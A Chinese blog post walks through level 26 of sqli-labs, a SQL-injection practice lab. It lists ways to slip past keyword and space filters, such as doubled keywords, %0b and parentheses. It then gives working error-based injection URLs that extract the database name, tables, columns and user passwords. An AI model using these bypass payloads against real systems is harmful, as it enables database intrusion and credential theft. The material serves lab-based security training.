程序员经验分享-hwhale

Sqlilabs-26

2023-10-28

来到了 Sqlilabs 大魔王的第 26 关关卡…

71859b459ba180da010ba22dd5acdf4.png

来到页面就看到大大的,“你的所有空格和过滤符都属于我们“,这难得到机智的你吗?
在此说下常见的绕过方法有:(本来这应该在 25 关卡就说的,忘了…)

  1. 双写绕过
  2. 大小写绕过
  3. 编码绕过,如:hex || URL
  4. 注释符绕过,如:/!select/
  5. 替换:如 and 可替换为 && ,or 可替换为 ||
  6. 空格的话我们可以 url 绕过:%a0 || %0b 等等,过滤字符我们可以用 and || or 替代

4ecc6ad02a297c4b37daf1791a14af4.png

有了上述的神兵利器,那就很快会被打脸的啦

http://sqlilabs/Less-26/?id=1' 回显错误

http://sqlilabs/Less-26/?id=1'%0band%0b'1'='1 回显正常 这里就用到了上述第 6 条,但是你细品构造的语句:

你会发现后台还把 and 过滤了,而且 %a0 和 %b0 根本不起作用,这就难为人家了…

3919698fa3e46af645e27950b8ef437.png

别着急,有我在,一步步来:
既然 and 被过滤,那就看看能不能双写绕过,答案是可以:
http://sqlilabs/Less-26/?id=1' aandnd '1'='1

4ff2452e4c4728f84f36c9d1fc13de5.png

and 我们处理完了,可想而知 or 应该也被过滤了,并且 --+ # 都被过滤了,前者双写可绕过,后者可以用 and 或者 or 替代,其实这个空格除了编码,还可以用 () 来绕过,比如:
查数据库名称,本来应该是:select database(),就可转换成 select(database()),结果如图:是一样的

31a21f7172c85ac2477699eccc94e3e.png
050c94f9b2f2accaedc093e57936a55.png

鉴于此题的特殊性,决定采用报错注入,结合上述的方法可以构造出如下的 payload:[这就达到了去除空格的效果]
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(database())),0x7e)))aandnd '1'='1

通过报错,得到了我们想要的数据:
720bd67dfbd7313af43a2e3dba89fb3.png

有了上面的例子,下面的 payload 构造就顺理成章啦:)

–查表:
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),0x7e)))aandnd'1'='1

acd9f19fea28b3592d77a6a59cf5ef4.png

–查列:
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())aandnd(table_name='users')),0x7e)))aandnd'1'='1

45913b8584c4edbaa15c16b256f0421.png

–查数据

–查用户名
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(passwoorrd))from(users)),0x7e)))aandnd'1'='1

6ca794cb53e49892a1464fff0631817.png

–查密码
http://sqlilabs/Less-26/?id=1'oorr(extractvalue(1,concat(0x7e,(select(group_concat(passwoorrd))from(users)),0x7e)))aandnd'1'='1

608b472b54fd65694ec8e9b72e3382b.png

可能细心地会发现这数据不完整,没关系,加个 where(id=5) 就可以间接地让数据完整了,
最后…看了波源码:

75b80d316fac4d2d5feeb51bda8429e.png

心里一句:| 是个狼人

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

sqlilabs

Sqlilabs-26 的相关文章

  • Sqlilabs-16

    相较于第 15 关 单引号变成了双引号 括号 查列 uname admin and if ascii substr select group concat table name from information schema tables

  • Sqlilabs-14

    这里来到了第 14 关 题目是个忽悠 说是单引号 括号 整的跟 13 关一样但其实就是个大忽悠 在 Hackbar 上做注入 这一关 hackbar 又可以用了 这是属于哪波操作 uname admin passwd 111 submit

  • sqlilabs靶场学习(part1:环境搭建)

    sqlilabs靶场学习 0x00 两个小目标 0x01 sqlilabs 简介 0x02 sqlilabs 环境搭建 1 db creds inc文件配置 2 setup db php文件创建表结构 0x03 测试关卡 0x00 两个小目

  • sqli-labs (less-34)

    sqli labs less 34 进入34关 我们发现又回到了我们熟悉的页面 我们直接输入用户名和密码登入进去 像之前的关卡一样 我们输入的用户名和密码也是使用POST的方式传输到了服务器 所以我们继续使用hackbar工具抓取POST内

  • sql-labs闯关26~31

    sql labs闯关26 31 友善爱国平等诚信民主富强爱国友善自由友善爱国平等诚信民主爱国爱国爱国 复习笔记1 第29 31关先跳过 回头再做 内容 sql labs第26关 GET请求 基于错误 过滤空格和注释 sql labs第26a

  • sqli-labs (less-21)

    sqli labs less 21 进入21关 输入用户名与密码 发现跟20关基本一样 这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager 抓取到cookie信息后 发现竟然是一串字母 这里就很懵了 但我们仔细

  • sqli-labs第二十六二十六a关

    这关油条加你的可以试试linux搭建sqlilabs这样比较简单 需要注意的 本关可能有的朋友在 windows 下无法使用一些特殊的字符代替空格 此处是因为 apache 的解析的问题 这里请更换到 linux 平台下 本关结合 25 关

  • sqli-labs(38-41)

    0x01 原理 堆叠注入 顾名思义就是很多语句结合在一起进行注入 在sql语句中 以 标志着一条语句的结束 要实现堆叠注入就是用 连接多条语句进行注入 即我们可以结束一个语句后 构造下一个语句 而union select也是将两条语句结合在

  • sqli-labs (less18-less19)

    less 18 头部注入 user agent 这里不补充http头的知识了 直接看源码可以看到 uname和passwd都有check input函数检查 所以直接这两个参数注入是不行的了 然后再继续看下去 有句sql语句有ip addr

  • sqli-labs通关(less31~less40)

    目录 Less31 Less32 Less33 Less34 Less35 Less36 Less37 Less38 Less39 Less40 Less31 这关和前两关也只是闭合不同的差别 思路还是通过HTTP参数污染绕过WAF 爆数据

  • Sqlilabs-22

    这里来到了第一阶段的最后一关 22 关 其实跟 21 关一样 只不过变成了双引号 而已 直接上菜吧o uname YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGR

  • sqli-labs(29-31)

    序 这三关都是双服务器问题 网上很多教程都只考虑了apache 其实是php apache jsp tomcat 环境的搭建已经写在了另外一篇博客中 这里再推荐一下一个大牛写得很好的博客 里面把每关的原理都讲得很清晰 但是他里面关于本关的原

  • sqli-labs (less-5)

    sqli labs less 5 第五关和前面的四关就不一样了 当我们输入id 1时 页面不会再返回用户名和密码 而是返回了 You are in 输入 http 127 0 0 1 sql1 Less 5 id 1 这里报错 根据错误信息

  • SQLI-LABS Less-17

    Update 数据库更新注入 具体情况 具体分析 函数 check input 对 uname 进行检查 从 uname 处是无法注入了 而对 passwd 进行了更新 可以利用这个 updata 进行注入 注意 这里必须的 uname 必

  • sqli-labs第九十关

    这两关是时间盲注 Less 9 GET Bilnd Time based String Quotes 手工注入 这里使用sleep 函数 闭合方式还是跳过 id 1 1 1 爆破数据库 id 1 and if ascii substr da

  • Sqli-labs-master 1-4闯关游戏

    Less 1 首先打开到Less 1 根据提示Please input the ID as parameter with numeric value 请输入ID作为带数值的参数 这里我们用GET方法进行尝试 id 1 可以看到返回了用户名及

  • sqli-labs解题大法29 ~40

    Less 29 堆叠查询 在一条语句之后加上分号 然后接下一条语句 可以一次执行多条语句 order by 排序 可以 联合查询 可以 参考Less 1 Background 6 服务器 两层 架构 http www cnblogs com

  • sql-labs闯关38~45

    sql labs闯关38 45 友善爱国平等诚信民主友善爱国爱国友善平等诚信自由平等友善平等法治诚信民主民主 复习笔记1 内容 sql labs第38关 GET请求 堆叠查询注入 字符型 sql labs第39关 GET请求 堆叠查询注入

  • sqli-labs Less-8

    Less 8 Get Blind Boolian Based Single Quotes 1 原页面 2 id 1 3 id 1 4 尝试布尔盲注 代码存在sql注入漏洞 然而页面既不会回显数据 也不会回显错误信息 我们可以通过构造语句 来

  • sqli-labs (less-33)

    sqli labs less 33 进入33关 输入id 1 这里我们直接通过查看源代码查看这关是否也使用了GBK编码 可知确实使用了GBK编码 所以我们在单引号前面输入 df即可让单引号成功逃逸 http 127 0 0 1 sql1 L

随机推荐

  • sort函数排序用法

    具体用法在上一篇博客中已经说明了 主要是sort函数实现了将数组数按从大到小的顺序给进行了排列 要注意的一点就是在头文件中声明 include跟 include 其次就是在调用函数时可以是sort a begin a end 也可以是表示具

  • LeetCode题目笔记——1351. 统计有序矩阵中的负数

    文章目录 题目描述 题目链接 题目难度 简单 方法一 暴力 代码 Python 方法二 二分搜索 代码 Python 方法三 倒序遍历 代码 Python 总结 题目描述 给你一个 m n 的矩阵 grid 矩阵中的元素无论是按行还是按列

  • 通过JS自动隐藏手机浏览器的地址栏

    大家通过手机自带浏览器打开百度 淘宝 在首页加载完毕后 会自动隐藏页面上方的地址栏 加之这些网站针对手机浏览器做了优化 乍看之下 还真难区分这是WEB APP还是Native App 如下左侧图片为通过safari打开淘宝网的首页 要不是因

  • 深入理解iOS API系列(一) textField:shouldChangeCharactersInRange:replacementString:

    前言 深入理解iOS API系列是一个较深解读iOS API的博文集 限于时间和作者精力 内容并不会全部原创 但是涵盖的内容 应该是广大iOS开发者 特别是初中级开发者经常误解或理解不够深刻的部分 主要是深入理解代理方法textField

  • 晶振相关知识

    系列文章目录 文章目录 系列文章目录 一 晶振原理 二 分类 三 晶体 crystal 与晶振 oscillator 四 有源晶振 五 无源晶振 六 分频 七 倍频 八 预分频 九 后分频 十 晶振误差 十一 万用表如何测晶振 总结 一 晶

  • 怎么看待ChatGPT封号这件事呢?

    最近的ChatGPT大量封号 刷爆了全网 我的两个个人账号被封禁了 不知道大家最近有没有遇到相关的报错信息 要么就是检查你当前的浏览器配置 最后来一个access denied 要么直接就给你来一个当前的国家不支持 今天我们就来分析一下背后

  • SpringCloud超详细教程

    1 认识微服务 随着互联网行业的发展 对服务的要求也越来越高 服务架构也从单体架构逐渐演变为现在流行的微服务架构 这些架构之间有怎样的差别呢 1 0 学习目标 了解微服务架构的优缺点 1 1 单体架构 单体架构 将业务的所有功能集中在一个项

  • 越界访问导致的死循环

    话不多说 上代码 include

  • 利用LiveGBS通过GB28181实现PC、手机WEB页面对监控摄像头直播以及语音对讲

    GB28181流媒体服务 具体介绍这边不多说 参考 https www liveqing com docs products LiveGBS html 国标设备语音对讲 支持语音对讲的设备 可以直接接入LiveGBS 这样就可以从控制中心和

  • Dubbo——Dubbo初识(1)

    背景 随着互联网的发展 网站应用的规模不断扩大 常规的垂直应用架构已无法应对 分布式服务架构以及流动计算架构势在必行 亟需一个治理系统确保架构有条不紊的演进 单一应用架构 当网站流量很小时 只需一个应用 将所有功能都部署在一起 以减少部署节

  • NOIP中的数学---第1课 位运算

    位运算常用运算 位操作是一种速度非常快的基本运算 有左移 右移 与 或 非 异或等运算 左移 左移一位 相当于某数乘以2 比如110左移1位变为1100 右边的空位补0 6变为12 表示为 110 lt lt 1 因此左移x位 相当于该数乘

  • 计算机网络02(交换机,路由器原理)

    目录 一 交换机与路由器 了解交换机 路由器 二 交换机详解 1 交换机 2 交换机类型 3 vpn 4 网络拓扑结构 5 数据链路层 6 交换机的原理和配置 7 VLAN 8 trunk 9 tcpdump抓包工具的安装和使用

  • 【AI人工智能】 你如果要使用最强大的语言模型,你还要有最精美的浏览器标签页iTab (2)

    个人主页 极客小俊 作者简介 web开发者 设计师 技术分享博主 希望大家多多支持一下 我们一起进步 如果文章对你有帮助的话 欢迎评论 点赞 收藏 加关注 iTab 安装插件 这也是一款很不错的标签页插件 我使用过一段时间 很不错 并且里面

  • ideal使用maven将源码包和jar一起打包并上传到私服

    在公司中同事将代码提交到私服 下载jar包后却看不到注释 此时是因为同事没有将源码打包并上传到私服 配置方法如下

  • 在CentOS 7上安装Caffe

    简介 Caffe 是一个广泛使用的清晰 高效 模块化的深度学习框架 是贾扬清 Yangqing Jia 在UC Berkeley 读博期间建立的项目 由伯克利AI实验室 Berkeley AI Research BAIR 及社区贡献者开发

  • DC基础学习(六)Verilog语言结构到门级的映射2

    Design Compiler 以下简称DC 是Synopsys公司用于做电路综合的核心工具 可以将HDL描述的电路转换为基于工艺库的门级网表 本系列主要介绍综合相关的知识以及DC工具的使用 Verilog编码效率的高低是综合后电路性能高低

  • 微信网页开发:微信内h5使用wx-open-launch-weapp打开小程序,微信内h5使用wx-open-launch-app打开App的方案

    需求场景 当我们需要使用在微信客户端打开的h5页面 在页面上打开微信小程序或者唤起App时 我们需要使用微信js sdk提供的开放标签能力 这其中 使用wx open launch weapp标签打开微信小程序 使用wx open laun

  • 将“Encountered an improper argument“ 问题有效解决

    其错误提示为 Encountered an improper argument 错误原因 错误原因其实是因为我们在调试完结束时候 有断点 红色圆点 还没有去掉 所以我们一点击停止调试之后 keil就会马上弹出这个错误 然后你就会发现你的ke

  • 夏普ar2048s打印机驱动安装_驱动人生 下载安装打印机驱动的方法

    驱动人生 安装打印驱动的方法 支持USB 网络 注 电脑需要连接互联网 某些新款机型或可能不支持 不支持的型号请用自带驱动安装 或者到品牌官网下载驱动 注 下载 驱动人生 请到官网下载 请不要在第三方下载 第三方可能绑定有应用程序 安装时可

  • Sqlilabs-26

    来到了 Sqlilabs 大魔王的第 26 关关卡 来到页面就看到大大的 你的所有空格和过滤符都属于我们 这难得到机智的你吗 在此说下常见的绕过方法有 本来这应该在 25 关卡就说的 忘了 双写绕过 大小写绕过 编码绕过 如 hex URL

热门标签